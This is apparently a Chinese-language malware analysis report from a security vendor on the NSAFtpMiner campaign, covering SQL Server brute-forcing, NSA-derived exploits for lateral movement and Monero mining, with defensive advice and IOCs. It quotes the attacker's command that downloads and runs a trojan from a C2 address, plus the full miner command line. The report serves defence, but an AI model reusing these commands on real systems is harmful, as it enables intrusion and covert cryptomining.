0×1 概述 騰訊御見威脅情報中心近期發現黑客通過1433埠爆破入侵SQL Server伺服器，再植入遠端控制木馬並安裝為系統服務，然後利用遠端控制木馬進一步載入挖礦木馬進行挖礦。隨後，黑客還會下載NSA武器攻擊工具在內網中攻擊擴散，若攻擊成功，會繼續在內網機器上安裝該遠端控制木馬。

木馬載入的攻擊模組幾乎使用了NSA武器庫中的十八般武器：

Eternalblue(永恆之藍)、Doubleplsar(雙脈衝星)、EternalChampion(永恆冠軍)、Eternalromance（永恆浪漫）、Esteemaudit（RDP漏洞攻擊）等漏洞攻擊工具均被用來進行內網攻擊，攻擊主程序偽裝成“Ftp系統核心服務”，還會利用FTP功能進行內網檔案更新。其攻擊內網機器後，植入遠端控制木馬，並繼續從C2地址下載挖礦和攻擊模組，進行內網擴散感染。

根據以上攻擊特點，騰訊御見威脅情報中心將其命名為1433爆破手礦工（NSAFtpMiner）。最新監測資料統計表明，1433爆破手礦工（NSAFtpMiner）已累計感染約3萬臺電腦。

1.png

NSAFtpMiner攻擊流程

1433爆破手礦工（NSAFtpMiner）有如下特點：

1.利用密碼字典爆破1433埠登入；

2.木馬偽裝成系統服務，COPY自身到c:\windows\svchost.exe，建立服務“Server Remote”；

3.利用NSA武器庫工具包掃描入侵內網開放445/139埠的計算機；

4.使用了NSA武器中的多個工具包Eternalblue(永恆之藍)、Doubleplsar(雙脈衝星)、EternalChampion(永恆冠軍)、Eternalromance（永恆浪漫）、Esteemaudit（RDP漏洞攻擊）；

5.遠端控制木馬建立“FTP系統核心服務”，提供FTP服務，供內網其他被入侵的電腦進行病毒庫更新；

6.下載挖礦程式在區域網組網挖取門羅幣；

7.累計感染近3萬臺電腦，廣東、浙江、江蘇中招電腦位於全國前三位。

令人吃驚的是，早在2017年3月方程式黑客組織就已公開NSA工具包，但在一年半之後，仍有大量企業未修復這些高危漏洞。1433爆破手礦工（NSAFtpMiner）此輪攻擊只是為了挖礦獲利，而實際上，黑客攻擊成功，已獲得系統完全控制權。竊取機密資訊、利用中毒電腦攻擊其他電腦、在內網植入勒索病毒徹底癱瘓網路等巨大風險均有可能出現。

騰訊御見威脅情報中心再次呼籲，企業網管應立刻採取行動，對系統高危漏洞進行修補。立刻糾正Web伺服器使用弱密碼，以保護企業資訊系統不被入侵破壞。

以下為詳細的技術分析報告。

0×2 詳細分析 0×2.1 入侵 1433埠SQL Server預設埠，用於供SQL Server對外提供服務。黑客們利用sa弱口令，通過密碼字典進行猜解爆破登入。由於一些管理員的安全意識薄弱，設定密碼簡單容易猜解，導致黑客往往能輕鬆進入伺服器。

黑客針對1433埠爆破成功後在受害機器執行命令：

“C:\Windows\System32\WScript.exe” “C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe 將遠端控制木馬植入。

clem.exe執行後拷貝自身到C:\windows\svchost.exe，並建立服務“Server Remote”。

2.png

動態獲取函式地址：

3.png

4.png

連線C2地址221.229.204.120：

5.png

傳送資料：

6.png

接收資料：

7.png

根據遠端命令執行相應程式碼：

8.png

0×2.2 NSA武器攻擊 遠端控制木馬clem.exe接收指令下載NSA攻擊模組主程式ru.exe，ru.exe執行後在C:\Program Files\Windowsd 釋放72個子檔案。

9.png

黑客攻擊時先關閉防火牆，然後啟動Fileftp.exe掃描內網機器的445/139埠，如果埠處於開啟狀態則利用多個NSA武器工具（Eternalblue等）對目標機器進行攻擊。若攻擊成功，則根據不同系統版本在受害機器上執行payload(x86/x64.dll),x86/x64.dll執行後釋放出runsum.exe並安裝執行，runsum.exe功能同最初的遠端控制模組clem.exe相同，接收指令下載挖礦模組和NSA攻擊模組進行挖礦攻擊和繼續感染。

如果內網機器開放有445/139埠且未安裝SMB漏洞相關補丁（ms17-010），則很容易造成批量感染。

檔案中包含NSA武器中的Eternalblue(永恆之藍)、Doubleplsar(雙脈衝星)、EternalChampion(永恆冠軍)、Eternalromance（永恆浪漫）、Esteemaudit（RDP漏洞攻擊）。

10.png

Fileftp.exe偽裝成“Ftp系統核心服務”。

11.png

主程序Fileftp.exe負責掃內網機器，呼叫攻擊模組進行攻擊。開始攻擊時先關閉防火牆。

12.png

建立執行緒掃描內網IP，檢測445/139埠是否開啟：

13.png

判斷機器系統版本：

14.png

Fileftp.exe利用多個NSA武器工具針對內網機器445埠進行攻擊，如果攻擊成功，則在目標機器執行Payload(x86/x64.dll)。

15.png

Fileftp.exe利用多個NSA武器工具針對內網機器139埠進行攻擊，如果攻擊成功，則在目標機器執行Payload(x86/x64.dll)。

16.png

內建FTP服務供內網機器進行病毒檔案更新。

17.png

使用kill.bat、Pkill.dll對攻擊程序進行清除。

18.png

0×2.3 Payload 木馬利用NSA武器進行內網攻擊後植入的DllPayload（x86.dll/x64.dll）在受害機器上執行後，釋放自身檔案中的遠端控制木馬runsum.exe，並將其安裝為服務“Server Remote”，等待遠端C2指令從而下載挖礦和NSA武器模組。

x86/x64.dll建立檔案C:\Windows\runsum.exe：

19.png

將自身檔案中的PE資料寫入runsum.exe：

20.png

啟動runsum.exe：

21.png

runsum.exe與遠端控制模組clem.exe相同，執行後拷貝自身到C:\Windows\svchost.exe並註冊為服務“Server Remote”。

22.png

23.png

0×2.4 挖礦 遠端控制木馬clem.exe下載挖礦模組xxs.exe，xxs.exe執行後釋放help.dll到C:\Windows\Fonts\sysIntl。

24.png

寫登錄檔

HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WindowsIntl_Help\Parameters\ServiceDll

將C:\Windows\Fonts\sysIntl\help.dll安裝為服務：

25.jpg

help.dll釋放礦機程式win1ogins.exe到以下目錄：

C:\Windows\Help\

C:\Windows\PLA\system\

C:\Windows\Fonts\system(x64)\

C:\Windows\Fonts\system(x86)\

C:\Windwos\dell\

26.png

win1ogins.exe採用開源挖礦程式xmrig編譯：

27.png

啟動礦機程式挖礦門羅幣：

C:\Windows\Fonts\syshost\win1ogins.exe

-a cryptonight -o stratum+tcp://asia.cryptonight-hub.miningpoolhub.com:20580 -u ump_98k.run -p runssll -k --donate-level=1

礦池：

asia.cryptonight-hub.miningpoolhub.com 0×3 傳播趨勢 騰訊御見威脅情報中心監測資料顯示，NSAFtpMiner攻擊從7月底開始爆發，8月中旬達到高峰，進入9月後有所緩解。NSAFtpMiner累計已感染近三萬臺電腦，受影響最嚴重省份前三為廣東、浙江、江蘇。

29.png

30.png

0×4 安全建議 1.伺服器使用安全的密碼策略，使用高強度密碼，切勿使用弱口令，防止黑客暴力破解。

2.手動安裝“永恆之藍”漏洞補丁請訪問以下頁面：

其中WinXP，Windows Server 2003使用者請訪問：

御點終端安全管理系統具備終端防毒統一管控、修復漏洞統一管控，以及策略管控等全方位的安全管理功能，可幫助企業管理者全面瞭解、管理企業內網安全狀況、保護企業安全。

31.jpg

4.個人使用者推薦使用騰訊電腦管家，攔截此類病毒攻擊。

IOCs C2： 221.229.204.120 礦池： asia.cryptonight-hub.miningpoolhub.com Md5: f82fa69bfe0522163eb0cf8365497da2

f61e81eaf4a9ac9cd52010da3954c2a9

f0881d5a7f75389deba3eff3f4df09ac

f01f09fe90d0f810c44dce4e94785227

ee2d6e1d976a3a92fb1c2524278922ae

e53f9e6f1916103aab8703160ad130c0

e4ad4df4e41240587b4fe8bbcb32db15

e30d66be8ddf31f44bb66b8c3ea799ae

d76942a6e35f5c2122ed5c995e9ce071

1e927920a7902c333e32c7b1bafa6b62

d2fb01629fa2a994fbd1b18e475c9f23

d1aae806243cc0bedb83a22919a3a660

d0e288c7f4d17d78e962c7cf236cdace

c4ce49fa3668d2958905e59635d548cf

c24315b0585b852110977dacafe6c8c1

ba629216db6cf7c0c720054b0c9a13f3

b777086fd83d0bc1dccdc7c126b207d0

a539d27f33ef16e52430d3d2e92e9d5c

a05c7011ab464e6c353a057973f5a06e

9b5e0c6e903aabc27439aaf3d9e55171

9a5cec05e9c158cbc51cdc972693363d

9744f0000284c2807de0651c7e0d980a

8d3ffa58cb0dc684c9c1d059a154cf43

8c80dd97c37525927c1e549cb59bcbf3

8b0a4ce79f5ecdb17ad168e35db0d0f9

89b7dac7d9ce5b75b08f5d037edd3869

8969668746ae64ca002cc7289cd1c5da

838ceb02081ac27de43da56bec20fc76

83076104ae977d850d1e015704e5730a

7bf105e0b693d72c36bee1a05a73e5c0

770d0caa24d964ea7c04ff5daf290f08

6fe4544d00b77e0295e779e82d8f0fe5

6b7276e4aa7a1e50735d2f6923b40de4

6a065c2940cda0120655a78753627c4d

649b368c52de83e52474a20ce4f83425

5e8ecdc3e70e2ecb0893cbda2c18906f

5b72ccfa122e403919a613785779af49

5adcbe8bbba0f6e733550ce8a9762fa0

4ff94c163565a38a27cf997ad07b3d69

4803a7863da607333378b773b6a17f4c

46f7b320b13a4b618946042360215179

4420f8917dc320a78d2ef14136032f69

43aac72a9602ef53c5769f04e1be7386

3e89c56056e5525bf4d9e52b28fbbca7

3e5d06dc6e7890e1800cf24c9f599856

3c2fe2dbdf09cfa869344fdb53307cb2

31d696f93ec84e635c4560034340e171

30017e300c6d92e126bf92017c195c37

2f0a52ce4f445c6e656ecebbcaceade5

25ccfc16fc622218e037d8788b25ed40

320789f7e092eb8d32bce93d11790b71

7a0328e24348574b7efebd38b695e3f4

d50b756e8fd5769c435787c4ccfef048

0c56bf81d235a3b967dc1af76586f17c